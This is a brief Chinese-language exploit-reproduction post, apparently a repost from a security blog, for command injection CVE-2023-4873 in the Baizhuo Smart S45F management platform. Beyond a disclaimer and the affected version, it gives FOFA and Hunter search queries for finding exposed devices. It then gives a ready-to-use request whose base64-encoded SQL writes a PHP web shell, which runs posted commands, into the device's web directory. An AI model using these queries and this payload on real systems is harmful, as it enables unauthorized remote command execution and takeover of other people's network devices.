【漏洞复现】百卓Smart S45F命令注入漏洞CVE-2023-4873
2023-9-14 11:47:39 Author: Matrix SEC(查看原文) 阅读量:38 收藏

  • 0x01 免责声明

请勿使用本文中所提供的任何技术信息或代码工具进行非法测试和违法行为。若使用者利用本文中技术信息或代码工具对任何计算机系统造成的任何直接或者间接的后果及损失,均由使用者本人负责。本文所提供的技术信息或代码工具仅供于学习,一切不良后果与文章作者无关。使用者应该遵守法律法规,并尊重他人的合法权益。

  • 0x02 影响版本

百卓Smart S45F

  • 0x03 网络测绘

fofa:

title="Smart--管理平台"

hunter:

web.title="Smart--管理平台"
  • 0x04 漏洞复现

/importexport.php?sql=c2VsZWN0IDB4M2MzZjcwNjg3MDIwNjU2MzY4NmYyMDczNzk3Mzc0NjU2ZDI4MjQ1ZjUwNGY1MzU0NWIyMjYzNmQ2NDIyNWQyOTNiM2YzZSBpbnRvIG91dGZpbGUgJy91c3IvaGRkb2NzL25zZy9hcHAvMHhQT0MucGhwJw==&type=exportexcelbysql


文章来源: http://mp.weixin.qq.com/s?__biz=Mzk0NDUzMjU0NA==&mid=2247484590&idx=2&sn=eec0257e5eed1cc3fa3905cd881ea1f4&chksm=c3227981f455f097cd3ab595289585439231dd152561534429a1f026d6270c0596c79a5a9067&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh